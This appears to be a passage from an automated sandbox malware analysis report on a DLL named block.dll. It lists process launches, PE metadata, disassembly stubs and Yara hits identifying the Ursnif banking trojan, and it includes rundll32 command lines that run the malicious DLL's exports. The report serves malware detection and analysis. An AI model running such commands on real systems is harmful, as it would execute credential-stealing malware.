                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:17410 /prefetch:2
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:17414 /prefetch:2
                      Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17410 /prefetch:2
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17414 /prefetch:2
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\block.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\block.dll,Pape1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\block.dll,RiverslowJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\block.dll',#1Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5856 CREDAT:17410 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5856 CREDAT:17414 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:17410 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5708 CREDAT:17414 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17410 /prefetch:2Jump to behavior
                      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6616 CREDAT:17414 /prefetch:2Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: block.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\Whether\class\156\Through\How.pdb source: block.dll
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD31F31 LoadLibraryA,GetProcAddress,1_2_6DD31F31
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD32253 push ecx; ret 1_2_6DD32263
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD32200 push ecx; ret 1_2_6DD32209
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD64475 push ecx; ret 1_2_6DD64488
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD4446A push esi; ret 1_2_6DD4446B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD42403 push ebp; retf 1_2_6DD4244E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD4243F push ebp; retf 1_2_6DD4244E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD4677F push esi; iretd 1_2_6DD4678A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD3FE6C push ebx; retf 1_2_6DD3FE6D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD45B7B push eax; ret 1_2_6DD45B7C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD4633B push edx; retf 1_2_6DD46345
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD7E175 push ds; iretd 1_2_6DD7E179
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD7D33E push dword ptr [ecx+4BFFD4DAh]; retf 1_2_6DD7D348
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033DB163 push edx; iretd 4_2_033DB164
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D7F97 push ecx; ret 4_2_033D7FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D7C20 push ecx; ret 4_2_033D7C29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033DB67C push ss; retf 4_2_033DB690
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD64475 push ecx; ret 4_2_6DD64488
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD4446A push esi; ret 4_2_6DD4446B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD42403 push ebp; retf 4_2_6DD4244E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD4243F push ebp; retf 4_2_6DD4244E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD4677F push esi; iretd 4_2_6DD4678A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD3FE6C push ebx; retf 4_2_6DD3FE6D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD45B7B push eax; ret 4_2_6DD45B7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD4633B push edx; retf 4_2_6DD46345
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD7E175 push ds; iretd 4_2_6DD7E179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD7D33E push dword ptr [ecx+4BFFD4DAh]; retf 4_2_6DD7D348

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000001.00000003.299036321.0000000001670000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.294762520.0000000004D50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.286919905.0000000003050000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.285453583.0000000003F50000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 1.3.loaddll32.exe.1678d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.3058d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6dd30000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.6dd30000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.3f58d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4d58d29.0.raw.unpack, type: UNPACKEDPE
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000004.00000003.353402660.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353461083.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352720988.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352839215.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352637772.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353493626.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353527674.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353601646.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353567176.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352699094.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352816951.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352743659.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353611757.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352664971.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.352761373.0000000003D28000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.353343104.0000000005A48000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5720, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5752, type: MEMORY
                      Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_033D4E9C Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,4_2_033D4E9C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD31F31 LoadLibraryA,GetProcAddress,1_2_6DD31F31
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD7BFB5 mov eax, dword ptr fs:[00000030h]1_2_6DD7BFB5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD7BAF2 push dword ptr fs:[00000030h]1_2_6DD7BAF2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6DD7BEEB mov eax, dword ptr fs:[00000030h]1_2_6DD7BEEB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD7BFB5 mov eax, dword ptr fs:[00000030h]4_2_6DD7BFB5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD7BAF2 push dword ptr fs:[00000030h]4_2_6DD7BAF2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6DD7BEEB mov eax, dword ptr fs:[00000030h]4_2_6DD7BEEB
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\block.dll',#1Jump to behavior
                      Source: loaddll32.exe, 00000001.00000002.504472454.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.504863861.00000000035F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd